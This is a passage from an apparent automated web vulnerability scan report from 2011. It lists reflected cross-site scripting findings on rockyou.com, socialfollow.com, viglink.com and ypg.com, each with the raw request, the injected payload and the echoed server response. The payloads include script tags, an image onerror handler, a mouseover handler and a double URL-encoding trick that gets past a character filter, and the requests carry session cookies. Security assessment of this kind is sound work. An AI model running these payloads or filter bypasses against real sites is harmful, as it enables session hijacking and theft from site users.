Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164368; sns_type=rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:34 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1276 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 496

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E&89cfe'><script>alert(1)</script>7080b8b8398=1'><
...[SNIP]...
4.154. http://www.rockyou.com/login/index.php [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/index.php

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1fb9'><script>alert(1)</script>afa40935826 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3Ef1fb9'><script>alert(1)</script>afa40935826 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164319

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:09 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1341 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 502

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3Ef1fb9'><script>alert(1)</script>afa40935826'>
...[SNIP]...
4.155. http://www.rockyou.com/login/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c1fe'><script>alert(1)</script>9081e91ace1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E&4c1fe'><script>alert(1)</script>9081e91ace1=1 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164319

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:16 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1132 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 505

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E&4c1fe'><script>alert(1)</script>9081e91ace1=1'>
...[SNIP]...
4.156. http://www.rockyou.com/show_my_gallery.php [instanceid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /show_my_gallery.php

Issue detail

The value of the instanceid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f872c%3balert(1)//f24bd738e00 was submitted in the instanceid parameter. This input was echoed as f872c;alert(1)//f24bd738e00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /show_my_gallery.php?instanceid=f872c%3balert(1)//f24bd738e00 HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:51:23 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ctid=2; expires=Mon, 25-Apr-2011 23:51:23 GMT; path=/; domain=.rockyou.com
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:22 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170683; expires=Wed, 27-Jul-2011 23:51:23 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=30952 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.
...[SNIP]...
<script type="text/javascript">
thumbnailStart = 0;
embed = new appEmbed(f872c;alert(1)//f24bd738e00);
var playerWidth = 400;
var playerHeight = 300;
document.getElementById('slideshow-container').style.width = playerWidth + "px";
document.getElementById('slideshow-container').style.height = play
...[SNIP]...
4.157. http://www.socialfollow.com/button/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload b5bdb%253cscript%253ealert%25281%2529%253c%252fscript%253ee78b4c98452 was submitted in the b parameter. This input was echoed as b5bdb<script>alert(1)</script>e78b4c98452 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the b request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/?b=1649b5bdb%253cscript%253ealert%25281%2529%253c%252fscript%253ee78b4c98452 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:11 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/javascript
Content-Length: 11739

<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warni
...[SNIP]...
<br/>var menu1649b5bdb<script>alert(1)</script>e78b4c98452={divclass:'sociallinks1649b5bdb<script>
...[SNIP]...
4.158. http://www.socialfollow.com/button/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/

Issue detail

The value of the b request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload fbcdd%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef42c8360436 was submitted in the b parameter. This input was echoed as fbcdd><script>alert(1)</script>f42c8360436 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the b request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/?b=1649fbcdd%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef42c8360436 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:10 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/javascript
Content-Length: 11768

<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warni
...[SNIP]...
nimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow1649fbcdd><script>alert(1)</script>f42c8360436.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetcl
...[SNIP]...
4.159. http://www.socialfollow.com/button/css/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/css/

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload 48b8b<a%20b%3dc>fb616593d15 was submitted in the b parameter. This input was echoed as 48b8b<a b=c>fb616593d15 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /button/css/?b=164948b8b<a%20b%3dc>fb616593d15&n=10&socialSites=72%3Adigg.gif%7C75%3Afacebook.gif%7C106%3Atwitter.png%7C169%3Asocial-follow.png%7C120%3Alinkedin.gif%7C71%3Adelicious.gif%7C208%3Astumbleupon.gif%7C113%3Ayoutube.gif%7C81%3Ahubpages.png%7C167%3Agoogle-profile.png HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:19 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 5044
Content-Type: text/css

div.sociallinks164948b8b<a b=c>fb616593d15{position:absolute;left:0;top:0;visibility:hidden;display:block;padding:10px 1px 1px 1px;font:normal 12px Arial, Helvetica, sans-serif;z-index:10000;border:1px solid #cfcfd0;background:#FFFFFF;width:35
...[SNIP]...
4.160. http://www.socialfollow.com/button/css/ [socialSites parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/css/

Issue detail

The value of the socialSites request parameter is copied into the HTML document as plain text between tags. The payload e88bc%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c2c44a872 was submitted in the socialSites parameter. This input was echoed as e88bc<script>alert(1)</script>d0c2c44a872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the socialSites request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/css/?b=1649&n=10&socialSites=72%3Adigg.gif%7C75%3Afacebook.gif%7C106%3Atwitter.png%7C169%3Asocial-follow.png%7C120%3Alinkedin.gif%7C71%3Adelicious.gif%7C208%3Astumbleupon.gif%7C113%3Ayoutube.gif%7C81%3Ahubpages.png%7C167%3Agoogle-profile.pnge88bc%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c2c44a872 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 4395
Content-Type: text/css

div.sociallinks1649{position:absolute;left:0;top:0;visibility:hidden;display:block;padding:10px 1px 1px 1px;font:normal 12px Arial, Helvetica, sans-serif;z-index:10000;border:1px solid #cfcfd0;backgro
...[SNIP]...
eat top left;}
li a.c81{background:url(http://www.socialfollow.com/button/images/hubpages.png) no-repeat top left;}
li a.c167{background:url(http://www.socialfollow.com/button/images/google-profile.pnge88bc<script>alert(1)</script>d0c2c44a872) no-repeat top left;}
#sfWrapper1649 .paddingSmall, div.sociallinks1649 .paddingSmall{padding-right:2px;#padding-right:0;clear: all;}
.socialFollowLink{width:100%;display:block;border:1px solid #D6D6D
...[SNIP]...
4.161. http://www.socialfollow.com/login.php [tEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The value of the tEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46ea"><a%20b%3dc>f618323402a was submitted in the tEmail parameter. This input was echoed as c46ea\"><a b=c>f618323402a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e8cc38ceb90f5b9aed64b628c2c57c25; __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1; __utmc=131048717; __utmb=131048717.1.10.1303137471
Content-Length: 31

tEmail=Emailc46ea"><a%20b%3dc>f618323402a&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:37:08 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4520
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input name="tEmail" id="tEmail" type="text" value="Emailc46ea\"><a b=c>f618323402a" class="textBoxSize" />
...[SNIP]...
4.162. http://www.viglink.com/users/login [ar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e67b"><script>alert(1)</script>1985adea2ef was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=9e67b"><script>alert(1)</script>1985adea2ef HTTP/1.1
Host: www.viglink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=383B0C6D3152B9F6F89669EF6FEDEA2A; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.6.10.1303153867

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 19:27:21 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=5251C7813673007E472E93A790A32B03; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 5416

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="9e67b"><script>alert(1)</script>1985adea2ef"/>
...[SNIP]...
4.163. http://www.viglink.com/users/login [ar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the HTML document as plain text between tags. The payload 5698e<script>alert(1)</script>ce99c61ebc1 was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e<script>alert(1)</script>ce99c61ebc1 HTTP/1.1
Host: www.viglink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=383B0C6D3152B9F6F89669EF6FEDEA2A; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.6.10.1303153867

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 19:27:23 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=AFD80718D54C8E99BFE116BEADEB91A6; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 5456

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="/users/action?"onmouseover=prompt(947209)>5698e<script>alert(1)</script>ce99c61ebc1"/>
...[SNIP]...
4.164. https://www.viglink.com/users/login [ar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd498"><script>alert(1)</script>ab2bdb7200c was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=dd498"><script>alert(1)</script>ab2bdb7200c HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=E5A9DFB004F15511014EB0A809D7A095; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.7.10.1303153867

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 19:28:18 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=429CA92B8479A597D30552C9302181F2; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 5416

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="dd498"><script>alert(1)</script>ab2bdb7200c"/>
...[SNIP]...
4.165. https://www.viglink.com/users/login [ar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the HTML document as plain text between tags. The payload 39c45<script>alert(1)</script>54c21684fb was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E39c45<script>alert(1)</script>54c21684fb HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=E5A9DFB004F15511014EB0A809D7A095; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.7.10.1303153867

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 19:28:20 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=BE4728D0077DC63E5BCC1964DAAFB5DF; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 5455

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="/users/action?"onmouseover=prompt(947209)>39c45<script>alert(1)</script>54c21684fb"/>
...[SNIP]...
4.166. http://www.ypg.com/en [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 10219--><img%20src%3da%20onerror%3dalert(1)>876ba4af52c was submitted in the REST URL parameter 1. This input was echoed as 10219--><img src=a onerror=alert(1)>876ba4af52c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en10219--><img%20src%3da%20onerror%3dalert(1)>876ba4af52c HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=fh9u4r4ioujp1m5s1hok6imtu1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
